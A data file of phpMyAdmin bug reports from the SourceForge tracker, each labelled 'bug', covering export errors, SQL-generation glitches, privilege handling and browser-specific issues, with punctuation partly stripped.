js querywindow.js).
Original URL https sourceforge.net p phpmyadmin bugs 2195 https sourceforge.net p phpmyadmin bugs 2195 Original author shawnkhall Found in version Latest Git","bug"
"24444","8561","Export foreign keys is broken.
In last CVS version is broken export InndoDB tables with foreign keys.
This version create ALTER TABLE `...` command with still the same table and add ADD CONSTRAINT to it.
Last ALTER TABLE contain all CONSTRAINTs for all table.
If you need, I can send example export file.
Original URL https sourceforge.net p phpmyadmin bugs 2201 https sourceforge.net p phpmyadmin bugs 2201 Original author tprochazka Found in version Latest Git","bug"
"24444","8562","sql error in generated order by queries.
when executing this query SELECT `customer status`.
, COUNT `customer`.`id` ) AS `customer` FROM `customer status` AS `customer status` LEFT JOIN `kunden` AS `customer` ON `customer status`.`id` = `customer`.`status id` GROUP BY `customer status`.`id` an invalid SQL is generated by phpMyAdmin SELECT `customer status`.
, COUNT `customer`.`id` ) AS `customer` FROM `customer status` AS `customer status` LEFT JOIN `kunden` AS `customer` ON `customer status`.`id` = `customer`.`status id` GROUP BY `customer status`.`id` ORDER BY.`customer` ASC LIMIT 0 , 30 Original URL https sourceforge.net p phpmyadmin bugs 2196 https sourceforge.net p phpmyadmin bugs 2196 Original author cybot tm Found in version Latest Git","bug"
"24444","8563","PMA cannot dl ) extensions on HP UX.
As HP UX uses a .sl extension for shared libraries, PMA cannot dl ) them when needed.
2 possible fixes in common.lib.php PMA dl ) 1\.
Compatible with PHP gt;= 4.3.0 module file= module.
.
.PHP SHLIB SUFFIX; 2\.
Compatible with any PHP version module file= module.
PHP OS== HP UX )?
.sl .so ); Regards Francois Original URL https sourceforge.net p phpmyadmin bugs 2197 https sourceforge.net p phpmyadmin bugs 2197 Original author flp1","bug"
"24444","8564","Copying table to another db MySQL 5.0.23).
Hi, I discovered an anoying bug in libraries sqlparser.lib.php It may be caused by the comment out of if typearr[3] != punct qualifier ) \{ after .= ; \} after .= \n ; At line 2226 To The problem is this one When you go in the operation of a table, Then select to move it to an other database The following sql is generated CREATE TABLE `dbname`.`tbname` Some data here ) ENGINE = MYISAM AUTO INCREMENT =36 DEFAULT CHARSET = utf8 COLLATE = utf8 unicode ci PACK KEYS =0 COMMENT = Table that contain the menu entry The problem is that the final sent to mysql server) query is that one CREATE TABLE `dbname`.`tbname` Some data here ) ENGINE = MYISAM AUTO INCREMENT =36DEFAULT CHARSET = utf8 COLLATE = utf8 unicode ci PACK KEYS =0 COMMENT = Table that contain the menu entry The problem is that AUTO INCREMENT =36 and DEFAULT CHARSET have no space between !!!
The sql query is fine in .
libraries tbl move copy.php 118 At line 128 the sql is regenerated with PMA SQP formatHtml from array resulting of PMA SQP parse at line 118.
And the missing space is not added before the DEFAULT I have a small patch see next attachement) that fix that bug, but it makes the query sometime without color.
I think that s a critical bug that should be tracked further...
I think that s not the only problem and it s identical for the space missing around the = in AUTO INCREMENT =36 Plz fix soon, that makes phpmyadmin unusable in real cases...
Original URL https sourceforge.net p phpmyadmin bugs 2199 https sourceforge.net p phpmyadmin bugs 2199 Original author rapsys Found in version 2.8.2","bug"
"24444","8565","Privileges are not being set properly.. Well I searched your database for any comments on this and have seen a few indirectly related to this but they all seem to skip around the issue we are see.
So the basics here are we are running MySQL 4.1.14 with phpMyAdmin 2.8.0.3 versions.
This same problem is also clearly duplicated in phpMyAdmin 2.6.3 pl1 The basic problem is when changing privileges for a user, the system does not revoke the exising privilges before doing the new GRANT command.
You can see this very easily by creating a user in for this test we created the user ChangeMe .
The user was created and phpMyAdmin ran the command GRANT SELECT , INSERT , UPDATE , DELETE , FILE ON .
TO ChangeMe localhost WITH MAX QUERIES PER HOUR 0 MAX CONNECTIONS PER HOUR 0 MAX UPDATES PER HOUR 0 ; Which are the Global Privileges we asked for.
Now we want to remove some of those privileges in this case we want to remove all the privileges leaving only the SELECT privilege.
Here is the command sequence that phpMyAdmin ran REVOKE GRANT OPTION ON .
FROM ChangeMe localhost ; GRANT SELECT ON .
TO ChangeMe localhost WITH MAX QUERIES PER HOUR 0 MAX CONNECTIONS PER HOUR 0 MAX UPDATES PER HOUR 0 ; If you look at the privilegs you will see that they are all still in force!
There is no way within phpMyAdim to revoke privileges you can only add more privileges!
We can make things work properly by manually revoking privilegs and then using phpMyAdmin to put in the ones we want.
But this sort of defeats the purpose of your tool.
Also we think this issue is implicated in a few posts that claim deleting users is not working.
Since there are privileges that never get revoke you fail on trying to delete the user.
I am not sure why there are no other posts on this but this is really making life complex for us.
By the way earlier versions worked just fine.
We are not sure at what version number this problem was introduced but as noted above it goes back to at least 2.6.3 pl1.
Please help...we do like your product it is quite cool.
Thanks in advance for your help.
Bernie Original URL https sourceforge.net p phpmyadmin bugs 2200 https sourceforge.net p phpmyadmin bugs 2200 Original author bernard j l Found in version 2.8.0.3","bug"
"24444","8566","Invalid config generated after special input.
Greetings, A user in the forums has reported a XSS vunerability with scripts setup.php.
I haven t personally tested it, nor has he provided many details of it, but his report is here http sourceforge.net forum forum.php?
thread id=1543233 forum id=72909 Because I know not whether those who monitor the tracker also monitor the forum, I figured I d report it here.
Also, there s no Category dropdown for the setup script, perhaps there should be then again, perhaps not...just a thought).
Original URL https sourceforge.net p phpmyadmin bugs 2202 https sourceforge.net p phpmyadmin bugs 2202 Original author ibennetch","bug"
"24444","8567","misaligned HTML when db collation empty.
Using phpMyAdmin 2.8.2 MySQL 4.1.13 After selecting a given database in the left frame, I get the list of tables in the right frame.
This list is presented as an HTML table with 7 columns Table Action Records Type Collation Size Overhead But the last row of this table the summary total row) has only 6 cells apparently the presumably empty) cell under Collation is missing.
I end up having the total Size in the Collation column and the total Overhead in the Size column.
Best, H. Original URL https sourceforge.net p phpmyadmin bugs 2203 https sourceforge.net p phpmyadmin bugs 2203 Original author alaoglu Found in version 2.8.2","bug"
"24444","8568","Multiple delete of identical items deletes just one.
In building a new application, I managed to get several rows of a table identical.
I wanted to use phpmyadmin to delete all but 1.
Checking the checkboxes and then choosing the X) to delete at the bottom of a browse table, only 1 was removed.
Probably not too serious, and I can see how it would happen.
Prof. J C Nash, U of Ottawa.
Original URL https sourceforge.net p phpmyadmin bugs 2204 https sourceforge.net p phpmyadmin bugs 2204 Original author jcnash","bug"
"24444","8569","dbi mysqli MYSQLI constants.
Script mysqli.dbi.lib.php,v 2.50 Section in script function PMA DBI get fields meta result) Bugs 1) MYSQLI TYPE CHAR although defined by php.
It has the value of 1 .
Unfortunately MYSQLI TYPE TINY s value is also 1 .
The result is the tiny int type will be returned as string type by this function!
Suggest remove this line typeAr[MYSQLI TYPE CHAR] = string ; Type CHAR and VARCHAR are covered by other constants!
2) In this line fields[ k] gt;blob = int) bool) fields[ k] gt; flags MYSQLI TYPE BLOB); MYSQLI TYPE BLOB should really be MYSQLI BLOB FLAG!
3) The two constants below are only available for MySQL 5.0.3 and up.
Suggest change code to if defined MYSQLI TYPE NEWDECIMAL )) \{ MySQL 5.0.3 and up typeAr[MYSQLI TYPE NEWDECIMAL] = real ; \} if defined MYSQLI TYPE BIT )) \{ MySQL 5.0.3 and up typeAr[MYSQLI TYPE BIT] = bool ; \} Original URL https sourceforge.net p phpmyadmin bugs 2205 https sourceforge.net p phpmyadmin bugs 2205 Original author lierduh Found in version Latest Git","bug"
"24444","8570","Browsing a table with a weird name.
maybe not a big bug, I just created this table for fun, but phpmyadmin cannot show its contents however, can export it).
Thanks for providing this great software.
CREATE TABLE `al``ma kor te` `a a` varchar 3) collate latin2 hungarian ci NOT NULL DEFAULT a , `b b` varchar 3) collate latin2 hungarian ci NOT NULL DEFAULT b , `c``c` varchar 3) collate latin2 hungarian ci NOT NULL DEFAULT n , `d` varchar 3) collate latin2 hungarian ci DEFAULT d , `e` varchar 3) collate latin2 hungarian ci NOT NULL DEFAULT e COMMENT repatorta , `f` varchar 3) collate latin2 hungarian ci NOT NULL DEFAULT f , `g` varchar 3) collate latin2 hungarian ci NOT NULL DEFAULT g , `h` int 10) unsigned NOT NULL DEFAULT 11 , `i` int 10) unsigned zerofill NOT NULL DEFAULT 0000000022 , `j` timestamp DEFAULT CURRENT TIMESTAMP , `k` varchar 3) collate latin2 hungarian ci NOT NULL, `l` varchar 3) collate latin2 hungarian ci DEFAULT NULL, `m` varchar 3) collate latin2 hungarian ci DEFAULT MMM , PRIMARY KEY `a a`, `b b`), UNIQUE KEY `e` `e`, `f` ), UNIQUE KEY `k` `k`, `l`, `m` ), KEY `c``c` `c``c`, `d` ), FULLTEXT KEY `d` `d`, `f` ) ) ENGINE=MyISAM DEFAULT CHARSET=latin2 COLLATE=latin2 hungarian ci; INSERT INTO `al``ma kor te` `a a`, `b b`, `c``c`, `d`, `e`, `f`, `g`, `h`, `i`, `j`, `k`, `l`, `m`) VALUES a , b , n , d , e , f , g , 11, 0000000022, 2006 08 01 21 16 59 , , NULL, MMM ), 1 , 2 , c , 44 , qwe , f , g , 11, 0000000022, 2006 08 01 21 18 52 , !
, r , MMM ), , , ` , q , ea , f , g , 11, 0000000022, 2006 08 01 21 23 52 , 4 , NULL, MMM ); Original URL https sourceforge.net p phpmyadmin bugs 2206 https sourceforge.net p phpmyadmin bugs 2206 Original author imi1984","bug"
"24444","8571","Database names incorrectly quoted.
When the database name contains an underscore, phpMyAdmin 2.8.2 incorrectly quotes the name when applying table privileges.
For example, db 1 becomes db\ 1 .
A side effect of this bug is that if a user has permissions on the database that were not granted through phpMyAdmin, so use db 1 ), table permissions can not be granted through phpMyAdmin.
Original URL https sourceforge.net p phpmyadmin bugs 2207 https sourceforge.net p phpmyadmin bugs 2207 Original author steve piner","bug"
"24444","8572","Memory exhausted at huge data export.
lt;br gt; lt;b gt;Fatal error lt; b gt; Allowed memory size of 8388608 bytes exhausted tried to allocate 4592482 bytes) in lt;b gt; usr share phpmyadmin export.php lt; b gt; on line lt;b gt;85 lt; b gt; lt;br gt; I was trying to export a table with about 7M records from localhost) while encountering this problem.
The table itself is about 315M big with 70M indexes.
Greets Original URL https sourceforge.net p phpmyadmin bugs 2214 https sourceforge.net p phpmyadmin bugs 2214 Original author g00fy Found in version 2.8.0.3","bug"
"24444","8573","Wrong table name in header from query window).
I selected table A, then opened the query window and executed an sql on table B.
Then I clicked the X button next to one of the records to delete that record and clicked OK.
But PMA deleted the record from table A which had the same primary key.
Original URL https sourceforge.net p phpmyadmin bugs 2208 https sourceforge.net p phpmyadmin bugs 2208 Original author pontosan3","bug"
"24444","8574","STD function Not Working.
The MySQL STD function does not seem to work in phpmyadmin ver 2.7 or 2.8.
If you create a simple database table TESTTABLE) with two fields ShowID and Rating) as follows ShowID....Rating 1.........4 1.........3 1.........2 1.........4 2.........3 2.........1 And then try to use a simple STD query such as Select ShowID, STD Rating) from TESTTABLE group by ShowID You get an error 1064.
However I can run the exact same query in phpmyadmin ver 2.6.2 and it works fine.
Original URL https sourceforge.net p phpmyadmin bugs 2209 https sourceforge.net p phpmyadmin bugs 2209 Original author nufsed","bug"
"24444","8575","Arbitrary Server entered by user does not work.
I would like to achive the following with phpmyadmin version 2.8.2.
I have few mysql servers manually configured in config.inc.php with authentication type config cfg[ Servers ][ i][ auth type ] = config ; The host, username and password are respectively set.
To connect to such entry I need only to select it from the left navigation panel servers combo.
I have one additional server entry, which uses cookie auth cfg[ Servers ][ i][ auth type ] = cookie ; Additionally, I have set cfg[ AllowArbitraryServer ] = TRUE; which, according description, should allow me to type arbitrary server address in the Server field in the login page which pma displays for cookie authenticated server.
Asumption is that pma will ignore the config.inc.php hardcoded server host address and will use the user typed one.
Unfortenately, pma still tries to connect to the host specified in the config file and not to the one specified in the login page.
Versions pma 2.8.2 php 5.1.4, [mysqli] extention loaded MySQL 4.0.x, 4.1.x web server irrelevant web browser Mozilla Firefox 1.5.0.5 example step by step configure PMA with two MySQL server entries.
For the first one lets name it CONFIG) specify valid host, [port], username, password, config authentication.
For the other lets name it COOKIE) specify valid host because if host is empty the server is skipped) and cookie authentication type.
Set valid cfg[blowfish secret] string.
Set cfg[AllowArbitraryServer] = TRUE.
Open index pma page.
Select the server named CONFIG.
Result pma immediately connects to specified pre configured host, with configured username and password and displays the databases.
Now select COOKIE server.
Login page is displayed.
Three fields are available for typing Server, Username, Password.
Enter server address different than the one pre configured for COOKIE server in config.inc.php file.
Enter username and password and proceed with login.
Expected result pma connects to the server host typed in the Server field on the login page.
Actual result pma connects to the pre defined server and ignores the host typed in the Server field.
end of step by step Original URL https sourceforge.net p phpmyadmin bugs 2210 https sourceforge.net p phpmyadmin bugs 2210 Original author gtalev Found in version 2.8.2","bug"
"24444","8576","sql.php updateTableTitle is not a function.
.
sql.php fires up a js)console error in FF) window.parent.updateTableTitle is not a function originating from common.lib line 1431 function in js querywindow.js line 329 not loaded?
wrong window.parent?
Original URL https sourceforge.net p phpmyadmin bugs 2211 https sourceforge.net p phpmyadmin bugs 2211 Original author windkiel Found in version Latest Git","bug"
"24444","8577","Export data and auto increment.
Hi all I found a problem with export data and auto increment when I export a table structure whith an auto increment column and I choose MySQL 3 or 4 compatibility, the auto increment option isn t exported.
Exemple I have this table on a v5 MySQL Server CREATE TABLE `test` `test id` int 11) NOT NULL auto increment, `test txt` varchar 255) NOT NULL, PRIMARY KEY `test id`) ) ENGINE=MyISAM DEFAULT CHARSET=latin1 AUTO INCREMENT=1 ; If I export this table with v3 or v4 compatibility I obtain this CREATE TABLE `test` `test id` int 11) NOT NULL, `test txt` varchar 255) NOT NULL, PRIMARY KEY `test id`) ) TYPE=MyISAM AUTO INCREMENT=1 ; The information on the auto increment column disapear.
I think I should obtain that CREATE TABLE `test` `test id` int 11) NOT NULL auto increment, `test txt` varchar 255) NOT NULL, PRIMARY KEY `test id`) ) TYPE=MyISAM AUTO INCREMENT=1 ; Original URL https sourceforge.net p phpmyadmin bugs 2212 https sourceforge.net p phpmyadmin bugs 2212 Original author coolcoyote Found in version 2.8.2.1","bug"
"24444","8578","Config not loaded on install.
With a fresh install of phpMyAdmin 2.8.2.1, I ran into a problem where the system wasn t picking up my config file.
It turns out the problem is in libraries common.inc.php.
Line 2994, there is this block of code if empty SESSION[ PMA Config ])) \{ ...
SESSION[ PMA Config ] = new PMA Config .
config.inc.php ); So it only parses the config file if there is no active session effectively).
Since I d hit the index.php page in my browser once before I had the config file fully setup, there was an active session with the base config data.
Since I couldn t log in, I couldn t log out to clear the session, so PMA never read my config file and was always giving me a MySQL 2002 error.
The server is not responding or the local MySQL server s socket is not correctly configured) .)
This wasn t mentioned in the documentation that I could see, so it took me a while to track it down.
Eventually clearing all cookies in my browser fixed it.
While I agree there is a performance benefit to caching the config this way, it makes installation notably trickier.
That s especially a problem, I d think, for people using an auth method of config or http, since they have no log out mechanism.
Perhaps some different caching mechanism?
Or some other check for the config file so that it s more forgiving?
As is, I consider this an installation bug.
Cheers.
Original URL https sourceforge.net p phpmyadmin bugs 2213 https sourceforge.net p phpmyadmin bugs 2213 Original author lgarfiel Found in version 2.8.2.1","bug"
"24444","8579","broken cluster session wrappers.
problem due hardcoded settings, PHP sesion wrappers are broken and remember data across cluster are imposible .
libraries session.inc.php line 98 ini set session.save handler , files ); solution let this to be decide on php configuration or does not make it default, please remove this piece of code thanks version 2.8.1 is also afected Original URL https sourceforge.net p phpmyadmin bugs 2215 https sourceforge.net p phpmyadmin bugs 2215 Original author sopak Found in version 2.8.2","bug"
"24444","8580","Loss of Create DB privs when pma enabled.
Loss of Create DB privs when pma enabled MySQL 4.0.16 standard PHP 4.1.2 Adding cfg[ Servers ][ i][ controluser ] = pma ; cfg[ Servers ][ i][ controlpass ] = pma ; to config file causes Red No priviledges on home although the user has all priviledges granted.
Removing entries restores the priviledge.
Original URL https sourceforge.net p phpmyadmin bugs 2216 https sourceforge.net p phpmyadmin bugs 2216 Original author camiel2 Found in version 2.8.2.1","bug"
"24444","8581","charset in excel export.
The Function PMA exportHeader in export htmlexcel.php has embedded PHP code in a string which isn t interpreted at least in PHP6).
The charset is being exported as PHP code, therefore excel cannot get the right charset.
A quick fix would be the inserting the following line before the string excelcharset = isset charset of file) ?
charset of file charset; and changing line 56 to lt;meta http equiv= Content type content= text html;charset= .
excelcharset.
gt; Original URL https sourceforge.net p phpmyadmin bugs 2217 https sourceforge.net p phpmyadmin bugs 2217 Original author vapir Found in version 2.8.2","bug"
"24444","8582","in database name.
When there is in database name, phpMyAdmin silently fails to select this database.
This can be currently seen on our demo server.
Original URL https sourceforge.net p phpmyadmin bugs 2218 https sourceforge.net p phpmyadmin bugs 2218 Original author nijel Found in version Latest Git","bug"
"24444","8583","Views are NOT displayed in export list.
Views are NOT displayed in export list, but included in SQL dump.
So, there is no possibility to exclude views from dump or dump only views.
Original URL https sourceforge.net p phpmyadmin bugs 2219 https sourceforge.net p phpmyadmin bugs 2219 Original author gurdiga Found in version 2.8.2.2","bug"
"24444","8584","Themes not switching.
Apparent bug in the theme manager system Bug has been experienced in IE6 and FireFox.
Pma v. 2.8.2.x With cfg[ ThemePerServer ] in config.inc.php set to TRUE , and a theme is selected in the pull down the theme changes OK.
However, when the server is changed, the theme does not change.
i.e.
theme is not swiched, when servers are swiched.
This behavior has been confirmed by Jxc3xbcrgen Wind and is discussed in the forum under thread Themes not sticking https sourceforge.net forum message.php?
msg id=3873602 ) Original URL https sourceforge.net p phpmyadmin bugs 2220 https sourceforge.net p phpmyadmin bugs 2220 Original author geoffreyg Found in version 2.8.2","bug"
"24444","8585","bug 1445120 returns, Cookie auth.
fails on IIS.
Looks like bug 1445120 is back in v2.8.2.2.
Cookie authentication is broken on IIS.
Worked in 2.8.2, did not try 2.8.2.1.
The bug is the same as 1445120.
No matter if you enter a correct or incorrect password, you are simply directed back to the login screen with no indictaion of what happened.
Windows 2000 Server, IIS 5, pma 2.8.2.2 Original URL https sourceforge.net p phpmyadmin bugs 2221 https sourceforge.net p phpmyadmin bugs 2221 Original author davidbowman Found in version 2.8.2.2","bug"
"24444","8586","fpdf error with E STRICT.
When trying to export a pdf pma page, with e strict on serveur there s lot s of warnings, you could find a phpinfo page in attached.
OS is SuSe Linux 10.1 with Apache 2.2.0 php 5.1.2 Strict Standards var Deprecated.
Please use the public private protected modifiers in phpmyadmin pdf schema.php on line 61 Strict Standards var Deprecated.
Please use the public private protected modifiers in phpmyadmin pdf schema.php on line 62 Strict Standards var Deprecated.
Please use the public private protected modifiers in phpmyadmin pdf schema.php on line 63 Strict Standards var Deprecated.
Please use the public private protected modifiers in phpmyadmin pdf schema.php on line 64 Strict Standards var Deprecated.
Please use the public private protected modifiers in phpmyadmin pdf schema.php on line 65 Strict Standards var Deprecated.
Please use the public private protected modifiers in phpmyadmin pdf schema.php on line 66 Strict Standards var Deprecated.
Please use the public private protected modifiers in phpmyadmin pdf schema.php on line 67 Strict Standards var Deprecated.
Please use the public private protected modifiers in phpmyadmin pdf schema.php on line 68 Strict Standards var Deprecated.
Please use the public private protected modifiers in phpmyadmin pdf schema.php on line 69 Strict Standards var Deprecated.
Please use the public private protected modifiers in phpmyadmin pdf schema.php on line 70 Strict Standards var Deprecated.
Please use the public private protected modifiers in phpmyadmin pdf schema.php on line 71 Strict Standards var Deprecated.
Please use the public private protected modifiers in phpmyadmin pdf schema.php on line 510 Strict Standards var Deprecated.
Please use the public private protected modifiers in phpmyadmin pdf schema.php on line 511 Strict Standards var Deprecated.
Please use the public private protected modifiers in phpmyadmin pdf schema.php on line 512 Strict Standards var Deprecated.
Please use the public private protected modifiers in phpmyadmin pdf schema.php on line 513 Strict Standards var Deprecated.
Please use the public private protected modifiers in phpmyadmin pdf schema.php on line 514 Strict Standards var Deprecated.
Please use the public private protected modifiers in phpmyadmin pdf schema.php on line 515 Strict Standards var Deprecated.
Please use the public private protected modifiers in phpmyadmin pdf schema.php on line 516 Strict Standards var Deprecated.
Please use the public private protected modifiers in phpmyadmin pdf schema.php on line 517 Strict Standards var Deprecated.
Please use the public private protected modifiers in phpmyadmin pdf schema.php on line 684 Strict Standards var Deprecated.
Please use the public private protected modifiers in phpmyadmin pdf schema.php on line 685 Strict Standards var Deprecated.
Please use the public private protected modifiers in phpmyadmin pdf schema.php on line 686 Strict Standards var Deprecated.
Please use the public private protected modifiers in phpmyadmin pdf schema.php on line 687 Strict Standards var Deprecated.
Please use the public private protected modifiers in phpmyadmin pdf schema.php on line 688 Strict Standards var Deprecated.
Please use the public private protected modifiers in phpmyadmin pdf schema.php on line 810 Strict Standards var Deprecated.
Please use the public private protected modifiers in phpmyadmin pdf schema.php on line 811 Strict Standards var Deprecated.
Please use the public private protected modifiers in phpmyadmin pdf schema.php on line 812 Strict Standards var Deprecated.
Please use the public private protected modifiers in phpmyadmin pdf schema.php on line 813 Strict Standards var Deprecated.
Please use the public private protected modifiers in phpmyadmin pdf schema.php on line 814 Strict Standards var Deprecated.
Please use the public private protected modifiers in phpmyadmin pdf schema.php on line 815 Strict Standards var Deprecated.
Please use the public private protected modifiers in phpmyadmin pdf schema.php on line 816 Strict Standards var Deprecated.
Please use the public private protected modifiers in phpmyadmin pdf schema.php on line 817 Strict Standards var Deprecated.
Please use the public private protected modifiers in phpmyadmin pdf schema.php on line 818 Strict Standards var Deprecated.
Please use the public private protected modifiers in phpmyadmin pdf schema.php on line 819 Strict Standards var Deprecated.
Please use the public private protected modifiers in phpmyadmin pdf schema.php on line 820 Strict Standards var Deprecated.
Please use the public private protected modifiers in phpmyadmin pdf schema.php on line 821 Strict Standards var Deprecated.
Please use the public private protected modifiers in phpmyadmin pdf schema.php on line 822 Strict Standards var Deprecated.
Please use the public private protected modifiers in phpmyadmin pdf schema.php on line 823 Warning Cannot modify header information headers already sent by output started at phpmyadmin pdf schema.php 687) in phpmyadmin libraries fpdf fpdf.php on line 1025 Original URL https sourceforge.net p phpmyadmin bugs 2222 https sourceforge.net p phpmyadmin bugs 2222 Original author tigerfoot","bug"
"24444","8587","Undefined variable on db copy.
phpMyAdmin 2.8.2.1 MySQL 5.0.22 I was copying a database to a new already existing empty database... and I got the error below...
I have not managed to replicate it... as other databases copied over correctly without error.
Only one top level element is allowed in an XML document.
Error processing resource http 83.245.15.39 mysqladmin db oper... lt;b gt;Notice lt; b gt; Undefined variable sql query in lt;b gt; usr local share phpmyadmin db operations.php lt; b gt;.. .
Original URL https sourceforge.net p phpmyadmin bugs 2227 https sourceforge.net p phpmyadmin bugs 2227 Original author ajos1 Found in version 2.9.0 beta1","bug"
"24444","8588","Column Help Link incorrect.
MySQL 5.0.24 standard phpMyAdmin 2.8.2.2 MySQL client version 5.0.7 beta Used PHP extensions mysqli English version The help link for image b help.png ) on table structure editing and table creation pages next to Type is incorrect.
It references http dev.mysql.com doc mysql en column types.html which results in File Not Found on mysql.com website.
The correct link should be http dev.mysql.com doc mysql en data types.html Original URL https sourceforge.net p phpmyadmin bugs 2223 https sourceforge.net p phpmyadmin bugs 2223 Original author gerardw Found in version 2.8.2.2","bug"
"24444","8589","Error Creating New Table with trailing `.
I was creating a new table and acidently added a ` at the end of the table name big no no) haha, this should nto be allowed in the upcoming releases.
Original URL https sourceforge.net p phpmyadmin bugs 2224 https sourceforge.net p phpmyadmin bugs 2224 Original author ccra300","bug"
"24444","8590","pma2823 setup.php broken with reg.glob.
Off.
pma2823 register globals = Off fresh download gt; 1045 gt; phpMyAdmin 2.8.2.3 setup Fatal error Call to a member function get ) on a non object in D \HTdocs\phpMyAdmin 2.8.2.3\scripts\setup.php on line 1836 register globals = On works but why should it depend on register globals?
Original URL https sourceforge.net p phpmyadmin bugs 2225 https sourceforge.net p phpmyadmin bugs 2225 Original author windkiel Found in version 2.8.2.3","bug"
"24444","8591","Changing database Konqueror).
Changing database in Konqueror 3.5.2 0.4 couldn t change database in left dropdown frame But changing database in Firefox 1.5.0.4 will work correctly.
How could that happen?
It worked fine in PMA 2.8.2.1 Rob Original URL https sourceforge.net p phpmyadmin bugs 2229 https sourceforge.net p phpmyadmin bugs 2229 Original author jgweijer Found in version 2.9.0 beta1","bug"
"24444","8592","Error Messages link outdated.
After a SQL error there is still the old link to http dev.mysql.com doc refman 5.0 en error returns.html displayed instead of the current http dev.mysql.com doc refman 5.0 en error messages server.html error messages server Keep up the good work, Renxc3xa9 Original URL https sourceforge.net p phpmyadmin bugs 2226 https sourceforge.net p phpmyadmin bugs 2226 Original author rele Found in version 2.8.2.2","bug"
"24444","8593","Copy table messes up AUTO INCREMENT attribute.
Consider the following table CREATE TABLE `foobar` `bla` int 10) unsigned NOT NULL auto increment, PRIMARY KEY `bla`) ) ENGINE=MyISAM AUTO INCREMENT=16 DEFAULT CHARSET=latin1 COLLATE=latin1 german2 ci When I try to copy this table to, say, foobar2, phpMyAdmin drops the space after the 16 CREATE TABLE `foobar2` `bla` int 10 ) unsigned NOT NULL AUTO INCREMENT , PRIMARY KEY `bla` ) ) ENGINE = MYISAM AUTO INCREMENT = 16DEFAULT CHARSET = latin1 COLLATE = latin1 german2 ci Original URL https sourceforge.net p phpmyadmin bugs 2228 https sourceforge.net p phpmyadmin bugs 2228 Original author tuktuk Found in version 2.8.2.4","bug"
"24444","8594","SQL popup causes lefthand nav.
to open new window Safari).
This bug appears to only affect Safari.
Basically the same behaviour that 2.8.0.x had where the left hand frame table links would ALWAYS open a new window in Safari that issue was fixed, see bug 1436279).
The difference with this is that it only occurs after having used the popup SQL window ie.
submitted a query from it at least once).
I tried in Firefox and I see the intended behaviour is that the SQL box is supposed to update when you click the frame links, and that behaviour seems to be broken as well.
For the record I am using Safari 2.0.4 on OS 10.4.7 Original URL https sourceforge.net p phpmyadmin bugs 2232 https sourceforge.net p phpmyadmin bugs 2232 Original author dasil003 Found in version 2.9.0.2","bug"
"24444","8595","Incorrect results display on import.
Since 2.8.1 this has been a problem for me.
I keep reverting back to 2.8.0.4 in which it does work correctly.
When using sql query window and you have more then 10 lines to be submitted it does not correctly display the results.
I have attached a screen shot of this problem.
Original URL https sourceforge.net p phpmyadmin bugs 2230 https sourceforge.net p phpmyadmin bugs 2230 Original author nukescripts Found in version 2.8.1","bug"
"24444","8596","export sql.php not working 500 error).
many users in the forums english and german) and on irc lately report blank page or attempt to download sql.php or broken connection when trying to export data ix and win, to file or screen), many have segfault in the ErrorLog.
demo server HEAD and STABLE) throws a 500 Server error even if it s a php problem, a workaround should be found.
Original URL https sourceforge.net p phpmyadmin bugs 2231 https sourceforge.net p phpmyadmin bugs 2231 Original author windkiel","bug"
"24444","8597","1046 No Database Selected with subquery.
PMA phpMyAdmin 2.6.1 DB MySQL 4.1.7 standard log OS CentOS 3.5 This query works fine SELECT DISTINCT retroid, retroteamid FROM relievers but using that query in a subquery SELECT FROM SELECT DISTINCT retroid, retroteamid FROM relievers )x yields 1046 No database selected The breadcrumb on the page read dump.php) shows the correct server and database names, but the table name is the alias of the subquery.
My guess is that the parser thinks the alias is a table, can t find the table within the database, and halts.
I get this error from the DB level SQL form, the table level SQL form, and the popup window.
This query works when I run it from the MySQL command line.
Original URL https sourceforge.net p phpmyadmin bugs 2233 https sourceforge.net p phpmyadmin bugs 2233 Original author jimpoz Found in version 2.6.1","bug"
"24444","8598","conflict with APC from PECL.
using php version 5.1.6 and APC 3.0.11 from PECL.
When I enable APC in php.ini, I got the error from index.php PHP Fatal error Invalid opcode 137 4 8. in home XXXXX public html apm28 libraries Theme Manager.class.php on line 99 In line 99 this gt;theme = new PMA Theme; The mysqladmin seems to work fine after I disabled the APC.
Lot of people claim that APC is better than eaccelarator because it has more active development team from php itself.
Original URL https sourceforge.net p phpmyadmin bugs 2234 https sourceforge.net p phpmyadmin bugs 2234 Original author cchere Found in version 2.8.2.4","bug"
"24444","8599","db rename with autoincrement filed.
when renaming DB with auto increment field and not defualt charset, generated query for creating new database merges last auto increment value with default keyword.
result looks like this CREATE TABLE `aaa`.`actionparticip` `IDACTIONPARTICIP` int 11 ) NOT NULL AUTO INCREMENT , `IDACTION` int 11 ) NOT NULL default 0 , `IDPERSON` int 11 ) NOT NULL default 0 , `PRESENCE` smallint 6 ) NOT NULL default 0 , PRIMARY KEY `IDACTIONPARTICIP` ) ) ENGINE = MYISAM AUTO INCREMENT = 317DEFAULT CHARSET = cp1250 COLLATE = cp1250 czech cs MySQL hlxc3xa1sxc3xad 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 317DEFAULT CHARSET = cp1250 COLLATE = cp1250 czech cs at line Original URL https sourceforge.net p phpmyadmin bugs 2235 https sourceforge.net p phpmyadmin bugs 2235 Original author muzikj Found in version 2.8.2.4","bug"
"24444","8600","SQL History does not work.
I want to use the SQL history function.
In firefox 1.5.0.6, IE 6 sp2 an IE 7 the following error is displayed Fehler missing ; before statement Quelldatei http phpmyadmin.domain.de querywindow.php Zeile 1, Spalte 203 Quelltext document.getElementById hiddenqueryform ).querydisplay tab.value = sql ; document.getElementById hiddenqueryform ).query history latest.value = SELECT FROM `address` WHERE `street` = ; It seems the query is not escape the .
Original URL https sourceforge.net p phpmyadmin bugs 2236 https sourceforge.net p phpmyadmin bugs 2236 Original author zakmc Found in version 2.9.0 beta1","bug"
"24444","8601","wrong sql export of foreign keys.
i was trying to export my innodb tables that are of course connected by multiple foreign keys, to import it back on my linuxbox.
the thing ive noticed was that the import on linux failed with the check your syntax.. error message, so i took a look into the exported .sql file and noticed that the sql queries that were supposed to import the proper foreign keys after the tables, got exported in a weird way.
the thing is that it happened only for the tables that have more than one foreign key reference to another table in my case, i only have 2 keys maximum tho).
